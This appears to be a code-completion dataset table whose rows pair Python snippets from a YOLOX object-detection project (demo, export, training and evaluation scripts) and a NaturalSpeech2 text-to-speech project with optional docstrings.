id (int64, 0-190k) | prompt (stringlengths 21-13.4M) | docstring (stringlengths 1-12k, nullable ⌀)
---|---|---|
189,213 | import argparse
import megengine as mge
import numpy as np
from megengine import jit
from build import build_and_load
def make_parser():
parser = argparse.ArgumentParser("YOLOX Demo Dump")
parser.add_argument("-n", "--name", type=str, default="yolox-s", help="model name")
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt for eval")
parser.add_argument(
"--dump_path", default="model.mge", help="path to save the dumped model"
)
return parser | null |
189,214 | import argparse
import megengine as mge
import numpy as np
from megengine import jit
from build import build_and_load
def dump_static_graph(model, graph_name="model.mge"):
model.eval()
model.head.decode_in_inference = False
data = mge.Tensor(np.random.random((1, 3, 640, 640)))
@jit.trace(capture_as_const=True)
def pred_func(data):
outputs = model(data)
return outputs
pred_func(data)
pred_func.dump(
graph_name,
arg_names=["data"],
optimize_for_inference=True,
enable_fuse_conv_bias_nonlinearity=True,
) | null |
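A minimal usage sketch, assuming the make_parser helper from the previous row and a converted MegEngine checkpoint passed via --ckpt (names are illustrative):
if __name__ == "__main__":
    args = make_parser().parse_args()
    model = build_and_load(args.ckpt, name=args.name)    # load weights into the chosen YOLOX variant
    dump_static_graph(model, graph_name=args.dump_path)  # trace and serialize the static graph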
189,215 | import argparse
import os
import time
import cv2
import megengine as mge
import megengine.functional as F
from loguru import logger
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import vis
from yolox.data.data_augment import preproc as preprocess
from build import build_and_load
def make_parser():
parser = argparse.ArgumentParser("YOLOX Demo!")
parser.add_argument(
"demo", default="image", help="demo type, eg. image, video and webcam"
)
parser.add_argument("-n", "--name", type=str, default="yolox-s", help="model name")
parser.add_argument("--path", default="./test.png", help="path to images or video")
parser.add_argument("--camid", type=int, default=0, help="webcam demo camera id")
parser.add_argument(
"--save_result",
action="store_true",
help="whether to save the inference result of image/video",
)
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt for eval")
parser.add_argument("--conf", default=None, type=float, help="test conf")
parser.add_argument("--nms", default=None, type=float, help="test nms threshold")
parser.add_argument("--tsize", default=None, type=int, help="test img size")
return parser | null |
189,216 | import argparse
import os
import time
import cv2
import megengine as mge
import megengine.functional as F
from loguru import logger
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import vis
from yolox.data.data_augment import preproc as preprocess
from build import build_and_load
def postprocess(prediction, num_classes, conf_thre=0.7, nms_thre=0.45):
box_corner = F.zeros_like(prediction)
box_corner[:, :, 0] = prediction[:, :, 0] - prediction[:, :, 2] / 2
box_corner[:, :, 1] = prediction[:, :, 1] - prediction[:, :, 3] / 2
box_corner[:, :, 2] = prediction[:, :, 0] + prediction[:, :, 2] / 2
box_corner[:, :, 3] = prediction[:, :, 1] + prediction[:, :, 3] / 2
prediction[:, :, :4] = box_corner[:, :, :4]
output = [None for _ in range(len(prediction))]
for i, image_pred in enumerate(prediction):
# If none are remaining => process next image
if not image_pred.shape[0]:
continue
# Get score and class with highest confidence
class_conf = F.max(image_pred[:, 5: 5 + num_classes], 1, keepdims=True)
class_pred = F.argmax(image_pred[:, 5: 5 + num_classes], 1, keepdims=True)
class_conf_squeeze = F.squeeze(class_conf)
conf_mask = image_pred[:, 4] * class_conf_squeeze >= conf_thre
detections = F.concat((image_pred[:, :5], class_conf, class_pred), 1)
detections = detections[conf_mask]
if not detections.shape[0]:
continue
nms_out_index = F.vision.nms(
detections[:, :4], detections[:, 4] * detections[:, 5], nms_thre,
)
detections = detections[nms_out_index]
if output[i] is None:
output[i] = detections
else:
output[i] = F.concat((output[i], detections))
return output | null |
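An illustrative call on dummy network output shaped (batch, num_anchors, 5 + num_classes); the thresholds are arbitrary:
import numpy as np
import megengine as mge
num_classes = 80
raw = mge.Tensor(np.random.random((1, 8400, 5 + num_classes)).astype("float32"))
dets = postprocess(raw, num_classes, conf_thre=0.25, nms_thre=0.45)
# dets[0] is None or an (N, 7) tensor: x1, y1, x2, y2, obj_conf, class_conf, class_idx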
189,217 | import argparse
import os
import time
import cv2
import megengine as mge
import megengine.functional as F
from loguru import logger
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import vis
from yolox.data.data_augment import preproc as preprocess
from build import build_and_load
IMAGE_EXT = [".jpg", ".jpeg", ".webp", ".bmp", ".png"]  # extensions accepted by get_image_list
def get_image_list(path):
image_names = []
for maindir, subdir, file_name_list in os.walk(path):
for filename in file_name_list:
apath = os.path.join(maindir, filename)
ext = os.path.splitext(apath)[1]
if ext in IMAGE_EXT:
image_names.append(apath)
return image_names
def image_demo(predictor, vis_folder, path, current_time, save_result):
if os.path.isdir(path):
files = get_image_list(path)
else:
files = [path]
files.sort()
for image_name in files:
outputs, img_info = predictor.inference(image_name)
result_image = predictor.visual(outputs[0], img_info)
if save_result:
save_folder = os.path.join(
vis_folder, time.strftime("%Y_%m_%d_%H_%M_%S", current_time)
)
os.makedirs(save_folder, exist_ok=True)
save_file_name = os.path.join(save_folder, os.path.basename(image_name))
logger.info("Saving detection result in {}".format(save_file_name))
cv2.imwrite(save_file_name, result_image)
ch = cv2.waitKey(0)
if ch == 27 or ch == ord("q") or ch == ord("Q"):
break | null |
189,218 | import argparse
import os
import time
import cv2
import megengine as mge
import megengine.functional as F
from loguru import logger
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import vis
from yolox.data.data_augment import preproc as preprocess
from build import build_and_load
def imageflow_demo(predictor, vis_folder, current_time, args):
cap = cv2.VideoCapture(args.path if args.demo == "video" else args.camid)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH) # float
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT) # float
fps = cap.get(cv2.CAP_PROP_FPS)
save_folder = os.path.join(
vis_folder, time.strftime("%Y_%m_%d_%H_%M_%S", current_time)
)
os.makedirs(save_folder, exist_ok=True)
if args.demo == "video":
save_path = os.path.join(save_folder, os.path.basename(args.path))
else:
save_path = os.path.join(save_folder, "camera.mp4")
logger.info(f"video save_path is {save_path}")
vid_writer = cv2.VideoWriter(
save_path, cv2.VideoWriter_fourcc(*"mp4v"), fps, (int(width), int(height))
)
while True:
ret_val, frame = cap.read()
if ret_val:
outputs, img_info = predictor.inference(frame)
result_frame = predictor.visual(outputs[0], img_info)
if args.save_result:
vid_writer.write(result_frame)
ch = cv2.waitKey(1)
if ch == 27 or ch == ord("q") or ch == ord("Q"):
break
else:
break | null |
189,219 | import argparse
from collections import OrderedDict
import megengine as mge
import torch
def make_parser():
parser = argparse.ArgumentParser()
parser.add_argument("-w", "--weights", type=str, help="path of weight file")
parser.add_argument(
"-o",
"--output",
default="weight_mge.pkl",
type=str,
help="path of weight file",
)
return parser | null |
189,220 | import argparse
from collections import OrderedDict
import megengine as mge
import torch
def numpy_weights(weight_file):
torch_weights = torch.load(weight_file, map_location="cpu")
if "model" in torch_weights:
torch_weights = torch_weights["model"]
new_dict = OrderedDict()
for k, v in torch_weights.items():
new_dict[k] = v.cpu().numpy()
return new_dict
def map_weights(weight_file, output_file):
torch_weights = numpy_weights(weight_file)
new_dict = OrderedDict()
for k, v in torch_weights.items():
if "num_batches_tracked" in k:
print("drop: {}".format(k))
continue
if k.endswith("bias"):
print("bias key: {}".format(k))
v = v.reshape(1, -1, 1, 1)
new_dict[k] = v
elif "dconv" in k and "conv.weight" in k:
print("depthwise conv key: {}".format(k))
cout, cin, k1, k2 = v.shape
v = v.reshape(cout, 1, cin, k1, k2)
new_dict[k] = v
else:
new_dict[k] = v
mge.save(new_dict, output_file)
print("save weights to {}".format(output_file)) | null |
189,221 | import megengine.functional as F
import megengine.module as M
class SiLU(M.Module):
    """Export-friendly SiLU: x * sigmoid(x)."""

    @staticmethod
    def forward(x):
        return x * F.sigmoid(x)
def get_activation(name="silu"):
if name == "silu":
module = SiLU()
elif name == "relu":
module = M.ReLU()
elif name == "lrelu":
module = M.LeakyReLU(0.1)
else:
raise AttributeError("Unsupported act type: {}".format(name))
return module | null |
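A quick shape-preserving check of the activation factory (input values are random):
import numpy as np
import megengine as mge
act = get_activation("silu")
x = mge.Tensor(np.random.randn(2, 16, 8, 8).astype("float32"))
y = act(x)   # same shape as x, SiLU applied elementwise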
189,222 | import megengine.functional as F
import megengine.module as M
from .network_blocks import BaseConv, DWConv
The provided code snippet includes necessary dependencies for implementing the `meshgrid` function. Write a Python function `def meshgrid(x, y)` to solve the following problem:
meshgrid wrapper for megengine
Here is the function:
def meshgrid(x, y):
"""meshgrid wrapper for megengine"""
assert len(x.shape) == 1
assert len(y.shape) == 1
mesh_shape = (y.shape[0], x.shape[0])
mesh_x = F.broadcast_to(x, mesh_shape)
mesh_y = F.broadcast_to(y.reshape(-1, 1), mesh_shape)
return mesh_x, mesh_y | meshgrid wrapper for megengine |
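For example, with small 1-D inputs the result matches numpy.meshgrid's default 'xy' indexing (a sketch):
xs = F.arange(4)                      # shape (4,)
ys = F.arange(3)                      # shape (3,)
grid_x, grid_y = meshgrid(xs, ys)     # both shaped (3, 4)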
189,223 | import megengine as mge
import megengine.module as M
from models.yolo_fpn import YOLOFPN
from models.yolo_head import YOLOXHead
from models.yolo_pafpn import YOLOPAFPN
from models.yolox import YOLOX
def build_yolox(name="yolox-s"):
num_classes = 80
# value meaning: depth, width
param_dict = {
"yolox-nano": (0.33, 0.25),
"yolox-tiny": (0.33, 0.375),
"yolox-s": (0.33, 0.50),
"yolox-m": (0.67, 0.75),
"yolox-l": (1.0, 1.0),
"yolox-x": (1.33, 1.25),
}
if name == "yolov3":
depth = 1.0
width = 1.0
backbone = YOLOFPN()
head = YOLOXHead(num_classes, width, in_channels=[128, 256, 512], act="lrelu")
model = YOLOX(backbone, head)
else:
assert name in param_dict
kwargs = {}
depth, width = param_dict[name]
if name == "yolox-nano":
kwargs["depthwise"] = True
in_channels = [256, 512, 1024]
backbone = YOLOPAFPN(depth, width, in_channels=in_channels, **kwargs)
head = YOLOXHead(num_classes, width, in_channels=in_channels, **kwargs)
model = YOLOX(backbone, head)
for m in model.modules():
if isinstance(m, M.BatchNorm2d):
m.eps = 1e-3
return model
def build_and_load(weight_file, name="yolox-s"):
model = build_yolox(name)
model_weights = mge.load(weight_file)
model.load_state_dict(model_weights, strict=False)
return model | null |
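Typical usage, assuming a MegEngine checkpoint produced by the weight-conversion rows above (the file name is illustrative):
model = build_and_load("yolox_s_mge.pkl", name="yolox-s")
model.eval()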
189,224 | import argparse
import os
import cv2
import numpy as np
import onnxruntime
from yolox.data.data_augment import preproc as preprocess
from yolox.data.datasets import COCO_CLASSES
from yolox.utils import mkdir, multiclass_nms, demo_postprocess, vis
def make_parser():
parser = argparse.ArgumentParser("onnxruntime inference sample")
parser.add_argument(
"-m",
"--model",
type=str,
default="yolox.onnx",
help="Input your onnx model.",
)
parser.add_argument(
"-i",
"--image_path",
type=str,
default='test_image.png',
help="Path to your input image.",
)
parser.add_argument(
"-o",
"--output_dir",
type=str,
default='demo_output',
help="Path to your output directory.",
)
parser.add_argument(
"-s",
"--score_thr",
type=float,
default=0.3,
help="Score threshould to filter the result.",
)
parser.add_argument(
"--input_shape",
type=str,
default="640,640",
help="Specify an input shape for inference.",
)
return parser | null |
189,225 | import argparse
import random
import warnings
from loguru import logger
import torch
import torch.backends.cudnn as cudnn
from yolox.core import launch
from yolox.exp import Exp, check_exp_value, get_exp
from yolox.utils import configure_module, configure_nccl, configure_omp, get_num_devices
def make_parser():
parser = argparse.ArgumentParser("YOLOX train parser")
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
# distributed
parser.add_argument(
"--dist-backend", default="nccl", type=str, help="distributed backend"
)
parser.add_argument(
"--dist-url",
default=None,
type=str,
help="url used to set up distributed training",
)
parser.add_argument("-b", "--batch-size", type=int, default=64, help="batch size")
parser.add_argument(
"-d", "--devices", default=None, type=int, help="device for training"
)
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="plz input your experiment description file",
)
parser.add_argument(
"--resume", default=False, action="store_true", help="resume training"
)
parser.add_argument("-c", "--ckpt", default=None, type=str, help="checkpoint file")
parser.add_argument(
"-e",
"--start_epoch",
default=None,
type=int,
help="resume training start epoch",
)
parser.add_argument(
"--num_machines", default=1, type=int, help="num of node for training"
)
parser.add_argument(
"--machine_rank", default=0, type=int, help="node rank for multi-node training"
)
parser.add_argument(
"--fp16",
dest="fp16",
default=False,
action="store_true",
help="Adopting mix precision training.",
)
parser.add_argument(
"--cache",
type=str,
nargs="?",
const="ram",
help="Caching imgs to ram/disk for fast training.",
)
parser.add_argument(
"-o",
"--occupy",
dest="occupy",
default=False,
action="store_true",
help="occupy GPU memory first for training.",
)
parser.add_argument(
"-l",
"--logger",
type=str,
help="Logger to be used for metrics. \
Implemented loggers include `tensorboard` and `wandb`.",
default="tensorboard"
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
return parser | null |
189,226 | import argparse
import os
from loguru import logger
import torch
from torch import nn
from yolox.exp import get_exp
from yolox.models.network_blocks import SiLU
from yolox.utils import replace_module
def make_parser():
parser = argparse.ArgumentParser("YOLOX onnx deploy")
parser.add_argument(
"--output-name", type=str, default="yolox.onnx", help="output name of models"
)
parser.add_argument(
"--input", default="images", type=str, help="input node name of onnx model"
)
parser.add_argument(
"--output", default="output", type=str, help="output node name of onnx model"
)
parser.add_argument(
"-o", "--opset", default=11, type=int, help="onnx opset version"
)
parser.add_argument("--batch-size", type=int, default=1, help="batch size")
parser.add_argument(
"--dynamic", action="store_true", help="whether the input shape should be dynamic or not"
)
parser.add_argument("--no-onnxsim", action="store_true", help="use onnxsim or not")
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="experiment description file",
)
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt path")
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
parser.add_argument(
"--decode_in_inference",
action="store_true",
help="decode in inference or not"
)
return parser | null |
189,227 | import argparse
import os
from loguru import logger
import torch
from yolox.exp import get_exp
def make_parser():
parser = argparse.ArgumentParser("YOLOX torchscript deploy")
parser.add_argument(
"--output-name", type=str, default="yolox.torchscript.pt", help="output name of models"
)
parser.add_argument("--batch-size", type=int, default=1, help="batch size")
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="experiment description file",
)
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt path")
parser.add_argument(
"--decode_in_inference",
action="store_true",
help="decode in inference or not"
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
return parser | null |
189,228 | import argparse
import os
import shutil
from loguru import logger
import tensorrt as trt
import torch
from torch2trt import torch2trt
from yolox.exp import get_exp
def make_parser():
parser = argparse.ArgumentParser("YOLOX ncnn deploy")
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="please input your experiment description file",
)
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt path")
parser.add_argument(
"-w", '--workspace', type=int, default=32, help='max workspace size in detect'
)
parser.add_argument("-b", '--batch', type=int, default=1, help='max batch size in detect')
return parser | null |
189,229 | import argparse
import os
import time
from loguru import logger
import cv2
import torch
from yolox.data.data_augment import ValTransform
from yolox.data.datasets import COCO_CLASSES
from yolox.exp import get_exp
from yolox.utils import fuse_model, get_model_info, postprocess, vis
def make_parser():
parser = argparse.ArgumentParser("YOLOX Demo!")
parser.add_argument(
"demo", default="image", help="demo type, eg. image, video and webcam"
)
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
parser.add_argument(
"--path", default="./assets/dog.jpg", help="path to images or video"
)
parser.add_argument("--camid", type=int, default=0, help="webcam demo camera id")
parser.add_argument(
"--save_result",
action="store_true",
help="whether to save the inference result of image/video",
)
# exp file
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="please input your experiment description file",
)
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt for eval")
parser.add_argument(
"--device",
default="cpu",
type=str,
help="device to run our model, can either be cpu or gpu",
)
parser.add_argument("--conf", default=0.3, type=float, help="test conf")
parser.add_argument("--nms", default=0.3, type=float, help="test nms threshold")
parser.add_argument("--tsize", default=None, type=int, help="test img size")
parser.add_argument(
"--fp16",
dest="fp16",
default=False,
action="store_true",
help="Adopting mix precision evaluating.",
)
parser.add_argument(
"--legacy",
dest="legacy",
default=False,
action="store_true",
help="To be compatible with older versions",
)
parser.add_argument(
"--fuse",
dest="fuse",
default=False,
action="store_true",
help="Fuse conv and bn for testing.",
)
parser.add_argument(
"--trt",
dest="trt",
default=False,
action="store_true",
help="Using TensorRT model for testing.",
)
return parser | null |
189,230 | import argparse
import os
import time
from loguru import logger
import cv2
import torch
from yolox.data.data_augment import ValTransform
from yolox.data.datasets import COCO_CLASSES
from yolox.exp import get_exp
from yolox.utils import fuse_model, get_model_info, postprocess, vis
IMAGE_EXT = [".jpg", ".jpeg", ".webp", ".bmp", ".png"]  # extensions accepted by get_image_list
def get_image_list(path):
    image_names = []
    for maindir, subdir, file_name_list in os.walk(path):
        for filename in file_name_list:
            apath = os.path.join(maindir, filename)
            ext = os.path.splitext(apath)[1]
            if ext in IMAGE_EXT:
                image_names.append(apath)
    return image_names
def image_demo(predictor, vis_folder, path, current_time, save_result):
if os.path.isdir(path):
files = get_image_list(path)
else:
files = [path]
files.sort()
for image_name in files:
outputs, img_info = predictor.inference(image_name)
result_image = predictor.visual(outputs[0], img_info, predictor.confthre)
if save_result:
save_folder = os.path.join(
vis_folder, time.strftime("%Y_%m_%d_%H_%M_%S", current_time)
)
os.makedirs(save_folder, exist_ok=True)
save_file_name = os.path.join(save_folder, os.path.basename(image_name))
logger.info("Saving detection result in {}".format(save_file_name))
cv2.imwrite(save_file_name, result_image)
ch = cv2.waitKey(0)
if ch == 27 or ch == ord("q") or ch == ord("Q"):
break | null |
189,231 | import argparse
import os
import time
from loguru import logger
import cv2
import torch
from yolox.data.data_augment import ValTransform
from yolox.data.datasets import COCO_CLASSES
from yolox.exp import get_exp
from yolox.utils import fuse_model, get_model_info, postprocess, vis
def imageflow_demo(predictor, vis_folder, current_time, args):
cap = cv2.VideoCapture(args.path if args.demo == "video" else args.camid)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH) # float
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT) # float
fps = cap.get(cv2.CAP_PROP_FPS)
if args.save_result:
save_folder = os.path.join(
vis_folder, time.strftime("%Y_%m_%d_%H_%M_%S", current_time)
)
os.makedirs(save_folder, exist_ok=True)
if args.demo == "video":
save_path = os.path.join(save_folder, os.path.basename(args.path))
else:
save_path = os.path.join(save_folder, "camera.mp4")
logger.info(f"video save_path is {save_path}")
vid_writer = cv2.VideoWriter(
save_path, cv2.VideoWriter_fourcc(*"mp4v"), fps, (int(width), int(height))
)
while True:
ret_val, frame = cap.read()
if ret_val:
outputs, img_info = predictor.inference(frame)
result_frame = predictor.visual(outputs[0], img_info, predictor.confthre)
if args.save_result:
vid_writer.write(result_frame)
else:
cv2.namedWindow("yolox", cv2.WINDOW_NORMAL)
cv2.imshow("yolox", result_frame)
ch = cv2.waitKey(1)
if ch == 27 or ch == ord("q") or ch == ord("Q"):
break
else:
break | null |
189,232 | import argparse
import os
import random
import warnings
from loguru import logger
import torch
import torch.backends.cudnn as cudnn
from torch.nn.parallel import DistributedDataParallel as DDP
from yolox.core import launch
from yolox.exp import get_exp
from yolox.utils import (
configure_module,
configure_nccl,
fuse_model,
get_local_rank,
get_model_info,
setup_logger
)
def make_parser():
parser = argparse.ArgumentParser("YOLOX Eval")
parser.add_argument("-expn", "--experiment-name", type=str, default=None)
parser.add_argument("-n", "--name", type=str, default=None, help="model name")
# distributed
parser.add_argument(
"--dist-backend", default="nccl", type=str, help="distributed backend"
)
parser.add_argument(
"--dist-url",
default=None,
type=str,
help="url used to set up distributed training",
)
parser.add_argument("-b", "--batch-size", type=int, default=64, help="batch size")
parser.add_argument(
"-d", "--devices", default=None, type=int, help="device for training"
)
parser.add_argument(
"--num_machines", default=1, type=int, help="num of node for training"
)
parser.add_argument(
"--machine_rank", default=0, type=int, help="node rank for multi-node training"
)
parser.add_argument(
"-f",
"--exp_file",
default=None,
type=str,
help="please input your experiment description file",
)
parser.add_argument("-c", "--ckpt", default=None, type=str, help="ckpt for eval")
parser.add_argument("--conf", default=None, type=float, help="test conf")
parser.add_argument("--nms", default=None, type=float, help="test nms threshold")
parser.add_argument("--tsize", default=None, type=int, help="test img size")
parser.add_argument("--seed", default=None, type=int, help="eval seed")
parser.add_argument(
"--fp16",
dest="fp16",
default=False,
action="store_true",
help="Adopting mix precision evaluating.",
)
parser.add_argument(
"--fuse",
dest="fuse",
default=False,
action="store_true",
help="Fuse conv and bn for testing.",
)
parser.add_argument(
"--trt",
dest="trt",
default=False,
action="store_true",
help="Using TensorRT model for testing.",
)
parser.add_argument(
"--legacy",
dest="legacy",
default=False,
action="store_true",
help="To be compatible with older versions",
)
parser.add_argument(
"--test",
dest="test",
default=False,
action="store_true",
help="Evaluating on test-dev set.",
)
parser.add_argument(
"--speed",
dest="speed",
default=False,
action="store_true",
help="speed test only.",
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
return parser | null |
189,233 | import os
import sys
import random
import time
import warnings
from loguru import logger
import torch
import torch.backends.cudnn as cudnn
from yolox.exp import Exp, get_exp
from yolox.core import Trainer
from yolox.utils import configure_module, configure_omp
from yolox.tools.train import make_parser
def assign_vis_parser():
parser = make_parser()
parser.add_argument("--max-batch", type=int, default=1, help="max batch of images to visualize")
return parser | null |
189,234 | from collections import namedtuple
from functools import wraps
from packaging import version
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange
def once(fn):
called = False
@wraps(fn)
def inner(x):
nonlocal called
if called:
return
called = True
return fn(x)
return inner | null |
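The decorator lets a function run exactly once, e.g.:
@once
def print_once(msg):
    print(msg)
print_once("printed")      # prints
print_once("suppressed")   # ignored on every later call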
189,235 | from typing import Tuple
import numpy as np
import torch
from torch import nn, Tensor
from torch.nn import Module
import torch.nn.functional as F
from einops import rearrange, repeat
from beartype import beartype
from beartype.typing import Optional
def exists(val):
return val is not None
def pad_tensor(input, pad, value=0):
pad = [item for sublist in reversed(pad) for item in sublist] # Flatten the tuple
assert len(pad) // 2 == len(input.shape), 'Padding dimensions do not match input dimensions'
return F.pad(input, pad, mode='constant', value=value)
def maximum_path(value, mask, const=None):
device = value.device
dtype = value.dtype
if not exists(const):
const = torch.tensor(float('-inf')).to(device) # Patch for Sphinx complaint
value = value * mask
b, t_x, t_y = value.shape
direction = torch.zeros(value.shape, dtype=torch.int64, device=device)
v = torch.zeros((b, t_x), dtype=torch.float32, device=device)
x_range = torch.arange(t_x, dtype=torch.float32, device=device).view(1, -1)
for j in range(t_y):
v0 = pad_tensor(v, ((0, 0), (1, 0)), value = const)[:, :-1]
v1 = v
max_mask = v1 >= v0
v_max = torch.where(max_mask, v1, v0)
direction[:, :, j] = max_mask
index_mask = x_range <= j
v = torch.where(index_mask.view(1,-1), v_max + value[:, :, j], const)
direction = torch.where(mask.bool(), direction, 1)
path = torch.zeros(value.shape, dtype=torch.float32, device=device)
index = mask[:, :, 0].sum(1).long() - 1
index_range = torch.arange(b, device=device)
for j in reversed(range(t_y)):
path[index_range, index, j] = 1
index = index + direction[index_range, index, j] - 1
path = path * mask.float()
path = path.to(dtype=dtype)
return path | null |
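A hedged smoke test: with an all-ones mask the result is a monotonic 0/1 alignment path of the same shape.
b, t_x, t_y = 1, 4, 6
value = torch.randn(b, t_x, t_y)
mask = torch.ones(b, t_x, t_y)
path = maximum_path(value, mask)   # (1, 4, 6), one active text index per output frame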
189,236 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def exists(x):
return x is not None
def default(val, d):
if exists(val):
return val
return d() if callable(d) else d | null |
189,237 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def identity(t, *args, **kwargs):
return t | null |
189,238 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def has_int_squareroot(num):
return (math.sqrt(num) ** 2) == num | null |
189,239 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def pad_or_curtail_to_length(t, length):
if t.shape[-1] == length:
return t
if t.shape[-1] > length:
return t[..., :length]
return F.pad(t, (0, length - t.shape[-1])) | null |
189,240 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
import torchaudio.transforms as T
from einops import rearrange, reduce, repeat
from einops.layers.torch import Rearrange, Reduce
from audiolm_pytorch import SoundStream, EncodecWrapper
from audiolm_pytorch.data import SoundDataset, get_dataloader
from beartype import beartype
from beartype.typing import Tuple, Union, Optional, List
from beartype.door import is_bearable
from naturalspeech2_pytorch.attend import Attend
from naturalspeech2_pytorch.aligner import Aligner, ForwardSumLoss, BinLoss
from naturalspeech2_pytorch.utils.tokenizer import Tokenizer, ESpeak
from naturalspeech2_pytorch.utils.utils import average_over_durations, create_mask
from naturalspeech2_pytorch.version import __version__
from accelerate import Accelerator
from ema_pytorch import EMA
from tqdm.auto import tqdm
import pyworld as pw
def prob_mask_like(shape, prob, device):
if prob == 1:
return torch.ones(shape, device = device, dtype = torch.bool)
elif prob == 0:
return torch.zeros(shape, device = device, dtype = torch.bool)
else:
return torch.zeros(shape, device = device).float().uniform_(0, 1) < prob | null |
189,241 | import math
import copy
from multiprocessing import cpu_count
from pathlib import Path
from random import random
from functools import partial
from collections import namedtuple
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn, einsum, Tensor
from torch.optim import Adam
from torch.utils.data import Dataset, DataLoader
import torchaudio
